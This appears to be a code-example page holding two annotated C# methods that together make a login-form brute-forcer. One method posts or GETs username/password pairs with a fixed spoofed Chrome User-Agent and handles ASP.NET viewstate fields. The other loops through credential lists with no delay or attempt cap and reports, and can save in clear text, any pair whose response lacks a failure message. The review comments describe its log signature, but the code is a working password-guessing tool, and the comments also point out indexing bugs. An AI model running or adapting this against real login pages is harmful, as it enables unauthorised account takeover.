Exemple #1
        /**
         * Submits one username/password pair to the configured login form and returns the response body.
         *
         * UserInput.formType selects the request shape:
         *   1       - getData() is called first (per the original comment, to pull __VIEWSTATE,
         *             __EVENTVALIDATION etc. from the initial page; getData is not shown here),
         *             then a form-encoded POST is sent.
         *   not 3   - form-encoded POST to UserInput.fullPath.
         *   3       - the pair is appended to UserInput.fullPath as a query string and no body is sent.
         *
         * Traffic profile, useful when looking for this client in logs: every request carries the same
         * hard-coded Chrome 76 User-Agent and Accept value, and Referer is set to the login URL itself.
         * In the formType 3 branch the credentials travel in the URL, so they would typically end up
         * wherever the receiving side records request URLs (access logs, proxies).
         *
         * NOTE(review): username and password are concatenated into the body/URL as-is; only the
         * field names pass through HttpUtility.UrlEncode.
         *
         * Returns responseStr, which is not declared in this method (presumably a class-level field - confirm).
         */
        public static string sendLoginRequest(string username, string password)
        {
            //formType 1 is treated as an ASP.NET form: fetch the hidden-field values before posting
            if (UserInput.formType == 1)
            {
                //Per the original comment this fills __VIEWSTATE, __EVENTVALIDATION etc. (getData not shown)
                getData();
            }

            if (UserInput.formType != 3)
            {
                //POST branch: the request targets UserInput.fullPath
                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath);
                request.Method = "POST";
                var postData = "";

                //When a view state value is present, echo the three ASP.NET hidden fields back with the credentials
                if (__VIEWSTATE.Length > 0)
                {
                    postData  = "__VIEWSTATE=" + __VIEWSTATE + "&";
                    postData += "__VIEWSTATEGENERATOR=" + __VIEWSTATEGENERATOR + "&";
                    postData += "__EVENTVALIDATION=" + __EVENTVALIDATION + "&";
                    postData += HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&";
                    postData += HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password;
                }

                //Otherwise the body holds only the username and password fields
                else
                {
                    postData  = HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&";
                    postData += HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password;

                    //formType 2 (the general form) appends the caller-supplied extra form variables verbatim
                    if (UserInput.formType == 2)
                    {
                        postData += "&" + UserInput.customFormVariables;
                    }
                }

                //Fixed headers: the User-Agent and Accept strings are constants, identical on every attempt
                //ContentLength is taken from the character count of the body string
                request.ContentLength = postData.Length;
                request.UserAgent     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36";
                request.Accept        = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3";

                //Referer is the login URL itself; no Cookie header is set in this branch
                request.ContentType = "application/x-www-form-urlencoded";
                request.Host        = UserInput.host;
                request.Referer     = UserInput.fullPath;

                //Write the form body into the request stream
                StreamWriter requestWriter = new StreamWriter(request.GetRequestStream());
                requestWriter.Write(postData);
                requestWriter.Close();

                //Read the whole response body into responseStr
                var response = request.GetResponse();
                responseStr = new StreamReader(response.GetResponseStream()).ReadToEnd();
            }
            else
            {
                //formType 3: rebuild the extra variables from the raw input on every call
                UserInput.customFormVariables = UserInput.buildCustomOptions(UserInput.rawFormVariables);

                //Credentials and extra variables go into the query string; Method is not assigned here,
                //so HttpWebRequest keeps its default (GET)
                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath + "?" + HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&" + HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password + "&" + UserInput.customFormVariables);
                //Same constant User-Agent and Accept values as the POST branch
                request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36";
                request.Accept    = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3";

                //Forward the user-supplied cookie string, if any (the inner check repeats the outer one)
                if (UserInput.cookies.Length > 0)
                {
                    if (UserInput.cookies.Length > 0)
                    {
                        request.Headers.Add(HttpRequestHeader.Cookie, UserInput.cookies);
                    }
                }

                request.ContentType = "application/x-www-form-urlencoded";
                request.Host        = UserInput.host;
                request.Referer     = UserInput.fullPath;

                //Read the whole response body into responseStr, then close the response
                WebResponse response = request.GetResponse();
                using (Stream data = response.GetResponseStream())
                {
                    StreamReader reader = new StreamReader(data);
                    responseStr = reader.ReadToEnd();
                }
                response.Close();
            }
            return(responseStr);
        }
Exemple #2
        /**
         * Runs the credential-guessing loop and reports the outcome on the console.
         *
         * After loadLists(), each candidate pair is passed to Requests.sendLoginRequest one at a time.
         * An attempt is counted as a match when the response does NOT contain
         * UserInput.invalidPasswordText, so any response that lacks that marker is reported as a
         * found password, whatever else it contains.
         *
         * Nothing in this method pauses between attempts or caps their number. Against one account it
         * would therefore appear server-side as a run of consecutive failed logins from one client -
         * the pattern that account-lockout thresholds, per-account / per-source rate limits and
         * failed-login alerting are meant to catch.
         *
         * usernames, passwords, username, foundPasswords, passwordFound, correctUsername,
         * correctPassword and showAttempts are not declared here (presumably class-level state - confirm).
         */
        public static void beginAttack()
        {
            //Populate the candidate lists (loadLists is not shown here)
            loadLists();

            //A non-empty usernames list selects list mode; otherwise the single username is used
            if (usernames.Count > 0)
            {
                //Every username is tried in turn
                foreach (string username in usernames)
                {
                    //Passwords are tried in list order until the first response without the failure marker
                    foreach (string password in passwords)
                    {
                        //Match: record the password and stop trying passwords for this username only
                        if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText))
                        {
                            foundPasswords.Add(password);
                            passwordFound = true;
                            break;
                        }

                        //NOTE(review): a placeholder is appended on every failed attempt, not once per username,
                        //so positions in foundPasswords are not guaranteed to line up with positions in usernames
                        else
                        {
                            foundPasswords.Add("No Password Found");
                        }

                        //With showAttempts set, each failed pair is echoed to the console in red
                        if (showAttempts == true)
                        {
                            Console.Write(String.Format("Username: {0}      Password: {1}       Status: ", username, password));
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.Write("Incorrect\n");
                            Console.ResetColor();
                        }
                    }
                }
            }

            //Single-username mode
            else
            {
                //Only the password list is iterated
                foreach (string password in passwords)
                {
                    //On the first match, store the pair in correctUsername / correctPassword and leave the loop
                    if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText))
                    {
                        passwordFound   = true;
                        correctPassword = password;
                        correctUsername = username;
                        break;
                    }

                    //With showAttempts set, each failed pair is echoed to the console in red
                    if (showAttempts == true)
                    {
                        Console.Write(String.Format("Username: {0}      Password: {1}       Status: ", username, password));
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.Write("Incorrect\n");
                        Console.ResetColor();
                    }
                }
            }

            //Reporting: runs once both loops above have finished
            if (passwordFound == true)
            {
                //A non-empty username means single-username mode was used
                if (username.Length > 0)
                {
                    //Print the matching pair in green
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.WriteLine("Password Found!!");
                    Console.WriteLine(String.Format("Username: {0}      Password: {1}", correctUsername, correctPassword));
                    Console.ResetColor();

                    //Typing "return" waits for a key press and goes back to UserInput.userSetup(); anything else exits after a key press
                    if (UserInput.getUserResponse("If you wish to return to the menu please type \"return\":") == "return")
                    {
                        Console.ReadKey();
                        UserInput.userSetup();
                    }
                    else
                    {
                        Console.WriteLine("Press Any Key To Exit...");
                        Console.ReadKey();
                    }
                }

                //List mode: print every entry that is not the placeholder, then offer to save the list
                else
                {
                    Console.WriteLine("The Following List Of Passwords Was Found...\n");
                    //NOTE(review): the loop is bounded by foundPasswords.Count but usernames is indexed with the same i
                    for (int i = 0; i < foundPasswords.Count; i++)
                    {
                        if (foundPasswords[i] != "No Password Found")
                        {
                            Console.WriteLine(String.Format("Username: {0}      Password: {1}", usernames[i], foundPasswords[i]));
                        }
                    }

                    //Optional export of the same list
                    if (UserInput.getUserResponse("Would you like to output this list to a file? (y/n):") == "y")
                    {
                        //The destination path is taken from the user as typed
                        string outPath = UserInput.getUserResponse("Enter An Output Path: ");
                        string output  = "";

                        for (int i = 0; i < foundPasswords.Count; i++)
                        {
                            if (foundPasswords[i] != "No Password Found")
                            {
                                output += String.Format("Username: {0}      Password: {1}", usernames[i], foundPasswords[i]) + "\n";
                            }
                        }

                        //The username/password pairs are written as clear text; File.WriteAllText replaces any existing file at outPath
                        File.WriteAllText(outPath, output);
                    }
                }
            }

            //No response without the failure marker was seen
            else
            {
                //Print the result in red, then wait for a key press before returning
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("No Matches Found");
                Console.ResetColor();
                Console.WriteLine("Press Any Key To Exit...");
                Console.ReadKey();
            }
        }